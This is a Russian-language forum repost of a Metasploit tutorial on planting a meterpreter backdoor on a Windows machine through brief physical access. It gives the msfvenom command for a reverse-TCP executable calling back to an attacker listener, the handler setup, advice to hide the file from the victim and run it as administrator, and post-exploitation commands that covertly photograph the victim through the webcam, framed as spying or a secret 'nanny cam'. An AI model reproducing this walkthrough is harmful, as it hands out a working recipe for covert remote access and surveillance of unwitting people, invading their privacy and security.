Основы Metasploit, часть 22: Эксплуатация и контроль системы при наличии физического доступа

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие кибервоины!

Многое из того, что мы сделали в этой серии «Основы Metasploit», позволяет нам эксплуатировать и контролировать удалённую систему в любой точке планеты Земля (или, по крайней мере, любую машину, подключенную к Интернету на планете Земля). В некоторых случаях нам может понадобиться контролировать систему, к которой у нас есть временный физический доступ. Это может быть машина в нашем офисе, в нашем доме, общежитии или другом доступном месте. Уверен, вы можете представить себе множество ситуаций, в которых это может быть правдой, например, когда государственный шпион получает физический доступ к конфиденциальной компьютерной системе всего на мгновение. Или, в более обыденном случае, вы можете превратить этот безобидный на вид ноутбук в «камеру-няню», пока вы в городе. В каждом случае на самом деле очень просто и легко внедрить полезную нагрузку meterpreter в систему, имея доступ примерно за 30 секунд и флеш-накопитель.

6a4a49_9d5a7a01bce047eb83360bbdaa0fc111~mv2.png


Многие из вас писали мне, ссылаясь на хакерские приключения Кевина Митника, описанные в его многочисленных книгах. В некоторых случаях Митник с помощью социальной инженерии получает физический доступ к компьютерным системам компании или учреждения и таким образом получает контроль над компьютером. Взлом, который я собираюсь здесь продемонстрировать, очень похож. Кроме того, вы, возможно, помните, в сериале «Мистер Робот» Анджела получает кратковременный физический доступ к компьютерной системе своего начальника и точно так же может узнать его пароль с помощью резиновой уточки и мимикаца.

В этом уроке мы сделаем то же самое. Мы создадим исполняемый файл со встроенным meterpreter, и всё, что нам нужно сделать для управления системой, — это скопировать исполняемый файл в целевую систему и нажать кнопку!

Шаг №1: Запустите Kali и откройте Metasploit

Первый шаг, конечно, — запустить систему Kali и запустить Metasploit.

kali > msfconsole

6a4a49_697ec25701f44a0286b77168344cd532~mv2.png


Шаг №2: создание исполняемого файла с помощью msfvenom

Теперь нам нужно создать исполняемый файл для Windows и встроить в него Meterpreter. Это можно сделать с помощью msfvenom (подробнее о msfvenom можно узнать здесь ).

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe >вредоносное ПО

6a4a49_78fba7d9eb984621b5055e1014c6378a~mv2.png


В данном случае я создал exe-файл и назвал его «вредоносным ПО». Вы можете назвать свой файл как-нибудь менее зловеще и более скрытно.

Шаг №3 Скопируйте exe-файл на флеш-накопитель

Затем скопируйте файл malware.exe на флеш-накопитель. Для этого используйте команду cp в Linux или перетащите файл на флеш-накопитель через проводник.

Шаг №4 Запустите Handler на вашем Kali

Прежде чем передать исполняемый файл целевой системе, необходимо запустить обработчик в Metasploit. Это просто TCP-слушатель, ожидающий обратного вызова и подключения от полезной нагрузки.

msf > использовать multi/handler

msf > установить полезную нагрузку windows/meterpreter/reverse_tcp

msf > установить LHOST 192.168.1.103

msf > установить LPORT 4444

msf> эксплойт


6a4a49_bcf559af18e9464b9f0451a57102fa50~mv2.png


Теперь этот обработчик будет ждать, пока вредоносная программа со встроенной полезной нагрузкой снова подключится к нему через порт 4444.

Шаг №5 Скопируйте exe-файл в целевую систему

Затем скопируйте вредоносное ПО с флеш-накопителя на целевую систему. Здесь я скопировал его на рабочий стол для демонстрации, но для большей скрытности вам, вероятно, стоит скопировать его в папку, которую жертва вряд ли откроет и увидит.

6a4a49_bff43ab8e40b4aae92fe0ac07fea5b39~mv2.png


Шаг №5. Запустите Exe.

Далее, поскольку это исполняемый файл, вы можете просто дважды щёлкнуть по нему, чтобы запустить его. Это должно одновременно запустить meterpreter. В идеале, вам следует запустить его от имени администратора, чтобы у meterpreter были права системного администратора. Для этого щёлкните правой кнопкой мыши и выберите «Запуск от имени администратора».

6a4a49_c25c8abab0eb4c278814ff95c6a71115~mv2.png


Шаг №6 Станьте владельцем системы!

Как только вредоносная программа запустится на целевой системе, она подключится к нашей системе Kali и откроет на ней meterpreter! Теперь эта система принадлежит вам!

6a4a49_f58f834bdb494d738d703e5e1ec1f5a3~mv2.png


Шаг №7: Веселье после эксплуатации!

Теперь, когда система у вас, вы можете делать практически всё, что захотите. Для начала давайте посмотрим, какие процессы запущены.

meterpreter > ps

6a4a49_e20e39d64c03440ebdbb921292522c1a~mv2.png
Как видите, процесс malware.exe запущен на целевой системе. Если бы жертва запустила диспетчер задач Windows, она бы увидела то же самое.

Если бы мы хотели использовать эту систему в качестве камеры-няни или для слежки за объектом, мы могли бы включить веб-камеру. Сначала нужно проверить, есть ли веб-камера.

meterpreter > webcam_list

6a4a49_89eb0a5b038f49209220b33571d9d3a1~mv2.png


Если доступна веб-камера, мы можем сделать снимок, введя:

meterpreter> webcam_snap

Снимок сохраняется в нашем каталоге /root. Чтобы просмотреть снимок, нужно просто открыть браузер и перейти к файлу.

6a4a49_b243b6b76aad4079bfc86f2bb5fcc412~mv2.png


Теперь, когда у нас есть целевая система, мы можем делать практически всё, что захотим! Больше идей по пост-эксплуатации вы найдёте в «Основах Metasploit», часть 15 , а также в моём списке команд и скриптов meterpreter , которые можно использовать на целевой системе.

Заключение

Если вы можете получить физический доступ практически к любой системе, игра окончена ! Имея физический доступ всего лишь около 30 секунд, вы можете внедрить в систему полезную нагрузку Meterpreter и делать с ней практически всё, что захотите, включая управление микрофоном, веб-камерой и даже кейлоггер. Надеюсь, это демонстрирует один из самых важных, но недооценённых принципов информационной безопасности — физическую безопасность.
 
Назад
Сверху Снизу